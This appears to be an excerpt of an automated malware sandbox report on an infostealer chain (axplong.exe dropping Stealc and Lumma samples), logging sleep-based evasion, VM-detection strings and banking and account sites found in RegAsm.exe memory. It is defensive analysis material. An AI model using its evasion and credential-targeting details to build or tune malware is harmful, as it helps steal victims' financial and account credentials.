Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1111
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1104
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1116
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 383
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1098
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1139
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1205
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1075
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 1081
Source: C:\Users\user\1000015002\b74664dd7e.exe Window / User API: threadDelayed 398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 3631
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000321001\2.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\2[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Blenar[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000285001\2.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exe
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe API coverage: 2.9 %
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7436 Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7436 Thread sleep time: -86043s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7412 Thread sleep count: 138 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7412 Thread sleep time: -276138s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7396 Thread sleep count: 272 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7396 Thread sleep time: -8160000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7512 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7424 Thread sleep count: 141 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7424 Thread sleep time: -282141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7432 Thread sleep count: 130 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7432 Thread sleep time: -260130s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7408 Thread sleep count: 4229 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7408 Thread sleep time: -8462229s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7416 Thread sleep count: 4245 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7416 Thread sleep time: -8494245s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7852 Thread sleep count: 118 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7852 Thread sleep time: -236118s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7876 Thread sleep count: 120 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7876 Thread sleep time: -240120s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7848 Thread sleep count: 8501 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7848 Thread sleep time: -17010501s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7816 Thread sleep count: 297 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7816 Thread sleep time: -1782000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8076 Thread sleep count: 45 > 30
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8076 Thread sleep time: -90045s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8080 Thread sleep count: 47 > 30
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8080 Thread sleep time: -94047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8060 Thread sleep count: 45 > 30
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8060 Thread sleep time: -90045s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8036 Thread sleep count: 337 > 30
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8036 Thread sleep time: -2022000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8084 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8084 Thread sleep time: -72036s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8064 Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8064 Thread sleep time: -86043s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8072 Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 8072 Thread sleep time: -98049s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe TID: 1512 Thread sleep time: -58750s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe TID: 1512 Thread sleep time: -58560s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 4456 Thread sleep count: 1181 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 4456 Thread sleep time: -2363181s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 5256 Thread sleep count: 1165 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 5256 Thread sleep time: -2331165s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 6776 Thread sleep count: 1156 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 6776 Thread sleep time: -2313156s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 3076 Thread sleep count: 392 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 3076 Thread sleep time: -2352000s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 2460 Thread sleep count: 1141 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 2460 Thread sleep time: -2283141s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 2332 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 2044 Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 2044 Thread sleep time: -198000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe TID: 5332 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 484 Thread sleep count: 1111 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 484 Thread sleep time: -2223111s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6432 Thread sleep count: 1104 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6432 Thread sleep time: -2209104s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6016 Thread sleep count: 1116 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6016 Thread sleep time: -2233116s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7312 Thread sleep count: 383 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 7312 Thread sleep time: -11490000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 760 Thread sleep count: 1098 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 760 Thread sleep time: -2197098s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6012 Thread sleep count: 1139 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6012 Thread sleep time: -2279139s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 712 Thread sleep count: 1205 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 712 Thread sleep time: -2411205s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 1104 Thread sleep count: 1075 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 1104 Thread sleep time: -2151075s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7036 Thread sleep count: 1081 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 7036 Thread sleep time: -2163081s >= -30000s
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 6540 Thread sleep count: 398 > 30
Source: C:\Users\user\1000015002\b74664dd7e.exe TID: 6540 Thread sleep time: -2388000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe TID: 2856 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5932 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6336 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4128 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Thread sleep count: Count: 5856 delay: -10
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E2C2A2 FindFirstFileExW, 17_2_00E2C2A2
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E668EE FindFirstFileW,FindClose, 17_2_00E668EE
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 17_2_00E6698F
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00E5D076
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00E5D3A9
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_00E69642
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_00E6979D
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 17_2_00E5DBBE
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 17_2_00E69B2B
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E65C97 FindFirstFileW,FindNextFileW,FindClose, 17_2_00E65C97
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 17_2_00DF42DE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: Amcache.hve.21.dr Binary or memory string: VMware
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: Amcache.hve.21.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: skotes.exe, 0000000B.00000002.3769918015.000000000148B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.3769918015.00000000014BA000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000FD2000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 0000000E.00000002.2586371888.0000000001342000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000000F.00000002.2352900147.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 00000013.00000002.2673207759.0000000001019000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000001A.00000002.2284052492.0000000000F86000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000001B.00000002.3769503003.0000000001480000.00000004.00000020.00020000.00000000.sdmp, b74664dd7e.exe, 0000001D.00000002.2792862379.0000000001269000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 3ec4738210.exe, 0000001A.00000002.2284052492.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware38
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.21.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 3ec4738210.exe, 0000000D.00000002.1976198696.0000000000F5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware*
Source: Amcache.hve.21.dr Binary or memory string: vmci.sys
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: axplong.exe, 0000001B.00000002.3769503003.000000000143D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@vH
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.21.dr Binary or memory string: VMware20,1
Source: Amcache.hve.21.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.21.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: b74664dd7e.exe, 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.21.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: RegAsm.exe, 00000021.00000002.2777212382.000000000633A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: Amcache.hve.21.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.21.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.21.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.21.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.21.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.21.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: 3ec4738210.exe, 3ec4738210.exe, 0000000F.00000002.2351235886.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, b74664dd7e.exe, 00000013.00000002.2671660081.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, 610cd559ac.exe, 00000017.00000002.1925800293.00000000002C7000.00000040.00000001.01000000.0000000D.sdmp, 3ec4738210.exe, 0000001A.00000002.2281536186.00000000005E8000.00000040.00000001.01000000.00000009.sdmp, axplong.exe, 0000001B.00000002.3753803094.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 0000001C.00000002.1990355028.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, b74664dd7e.exe, 0000001D.00000002.2791005796.0000000000928000.00000040.00000001.01000000.0000000A.sdmp, axplong.exe, 0000001E.00000002.2132470918.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp, axplong.exe, 00000029.00000002.2741698869.00000000008D7000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.21.dr Binary or memory string: VMware Virtual USB Mouse
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: Amcache.hve.21.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.21.dr Binary or memory string: VMware, Inc.
Source: b74664dd7e.exe, 0000000E.00000002.2586371888.00000000012CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware~
Source: Amcache.hve.21.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.21.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.21.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: b74664dd7e.exe, 0000000E.00000002.2586371888.000000000132E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW&
Source: Amcache.hve.21.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: file.exe, 00000006.00000003.1307057377.000000000080A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\hl
Source: b74664dd7e.exe, 00000013.00000002.2673207759.0000000000FED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.21.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.21.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: b74664dd7e.exe, 0000000E.00000002.2586371888.0000000001315000.00000004.00000020.00020000.00000000.sdmp, 3ec4738210.exe, 0000001A.00000002.2284052492.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.21.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.21.dr Binary or memory string: \driver\vmci,\driver\pci
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: RegAsm.exe, 00000021.00000002.2744975325.0000000003673000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: Amcache.hve.21.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
